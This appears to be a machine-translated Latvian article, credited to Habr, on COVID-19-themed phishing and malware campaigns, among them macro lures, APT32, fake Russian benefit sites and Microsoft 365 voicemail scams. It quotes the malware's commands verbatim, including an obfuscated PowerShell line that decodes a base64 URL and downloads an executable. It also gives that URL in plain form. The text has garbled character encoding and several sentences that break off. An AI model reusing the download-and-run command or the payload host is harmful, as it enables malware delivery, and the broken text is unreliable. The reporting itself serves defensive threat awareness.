UzbrucÄji turpina izmantot COVID-19 tÄmu, radot arvien vairÄk apdraudÄjumu lietotÄjiem, kurus ļoti interesÄ viss, kas saistÄ«ts ar epidÄmiju. IN
Atceries iekÅ”Ä
Vai vÄlaties veikt bezmaksas COVID-19 testu?
VÄl viens nozÄ«mÄ«gs ar koronavÄ«rusu saistÄ«ts pikŔķerÄÅ”anas piemÄrs bija
ArÄ« lielÄko daļu lietotÄju bija viegli pÄrliecinÄt iespÄjot makro. Lai to izdarÄ«tu, tika izmantots standarta triks: lai aizpildÄ«tu anketu, vispirms ir jÄiespÄjo makro, kas nozÄ«mÄ, ka jums ir jÄpalaiž VBA skripts.
KÄ redzat, VBA skripts ir Ä«paÅ”i maskÄts no antivÄ«rusiem.
SistÄmÄ Windows ir gaidÄ«Å”anas funkcija, kurÄ lietojumprogramma gaida /T <sekundes>, pirms pieÅem noklusÄjuma atbildi āJÄā. MÅ«su gadÄ«jumÄ skripts gaidÄ«ja 65 sekundes pirms pagaidu failu dzÄÅ”anas:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Un, gaidot, tika lejupielÄdÄta ļaunprÄtÄ«ga programmatÅ«ra. Å im nolÅ«kam tika palaists Ä«paÅ”s PowerShell skripts:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
PÄc Base64 vÄrtÄ«bas atkodÄÅ”anas PowerShell skripts no VÄcijas lejupielÄdÄ aizmugures durvis, kas atrodas iepriekÅ” uzlauztajÄ tÄ«mekļa serverÄ«:
http://automatischer-staubsauger.com/feature/777777.png
un saglabÄ to ar nosaukumu:
C:UsersPublictmpdirfile1.exe
Mape āC:UsersPublictmpdirā
tiek dzÄsts, palaižot failu 'tmps1.bat', kas satur komandu cmd /c mkdir ""C:UsersPublictmpdir"".
MÄrÄ·tiecÄ«gs uzbrukums valsts aÄ£entÅ«rÄm
TurklÄt FireEye analÄ«tiÄ·i nesen ziÅoja par mÄrÄ·tiecÄ«gu APT32 uzbrukumu, kas bija vÄrsts pret valdÄ«bas struktÅ«rÄm UhaÅÄ, kÄ arÄ« Ķīnas ÄrkÄrtas situÄciju pÄrvaldÄ«bas ministriju. VienÄ no izplatÄ«tajiem RTF bija saite uz New York Times rakstu ar nosaukumu
Interesanti, ka atklÄÅ”anas brÄ«dÄ« neviens no antivÄ«rusiem Å”o gadÄ«jumu neatklÄja, norÄda Virustotal.
Kad oficiÄlÄs vietnes nedarbojas
VisspilgtÄkais pikŔķerÄÅ”anas uzbrukuma piemÄrs notika KrievijÄ tikai otro dienu. Iemesls tam bija ilgi gaidÄ«tÄ pabalsta noteikÅ”ana bÄrniem vecumÄ no 3 lÄ«dz 16 gadiem. Kad 12. gada 2020. maijÄ tika paziÅots par pieteikumu pieÅemÅ”anas sÄkumu, miljoni steidzÄs uz Valsts dienesta vietni pÄc ilgi gaidÄ«tÄs palÄ«dzÄ«bas un nogÄza portÄlu ne sliktÄk kÄ profesionÄls DDoS uzbrukums. Kad prezidents teica, ka āValsts dienesti nevar tikt galÄ ar pieteikumu plÅ«smuā, cilvÄki tieÅ”saistÄ sÄka runÄt par alternatÄ«vas pieteikumu pieÅemÅ”anas vietnes izveidi.
ProblÄma ir tÄ, ka vairÄkas vietnes sÄka darboties vienlaikus, un viena, Ä«stÄ vietnÄ posobie16.gosuslugi.ru, faktiski pieÅem pieteikumus,
KolÄÄ£i no SearchInform atrada aptuveni 30 jaunus krÄpnieciskus domÄnus .ru zonÄ. Infosecurity un Softline Company kopÅ” aprīļa sÄkuma ir izsekojuÅ”i vairÄk nekÄ 70 lÄ«dzÄ«gu viltotu valdÄ«bas dienestu vietÅu. To veidotÄji manipulÄ ar pazÄ«stamiem simboliem un izmanto arÄ« vÄrdu gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie un tÄ tÄlÄk kombinÄcijas.
Hype un sociÄlÄ inženierija
Visi Å”ie piemÄri tikai apstiprina, ka uzbrucÄji veiksmÄ«gi gÅ«st peļÅu no koronavÄ«rusa tÄmas. Un jo lielÄka ir sociÄlÄ spriedze un neskaidrÄku jautÄjumu, jo lielÄka iespÄja krÄpniekiem nozagt svarÄ«gus datus, piespiest cilvÄkus paÅ”iem atteikties no savas naudas vai vienkÄrÅ”i uzlauzt vairÄk datoru.
Un, Åemot vÄrÄ to, ka pandÄmija ir piespiedusi potenciÄli nesagatavotus cilvÄkus masveidÄ strÄdÄt no mÄjÄm, apdraudÄti ir ne tikai personiskie, bet arÄ« korporatÄ«vie dati. PiemÄram, nesen pikŔķerÄÅ”anas uzbrukumam tika pakļauti arÄ« Microsoft 365 (agrÄk Office 365) lietotÄji. CilvÄki saÅÄma milzÄ«gus āneatbildÄtosā balss ziÅojumus kÄ vÄstuļu pielikumus. TomÄr faili patiesÄ«bÄ bija HTML lapa, uz kuru tika nosÅ«tÄ«ti uzbrukuma upuri
Avots: www.habr.com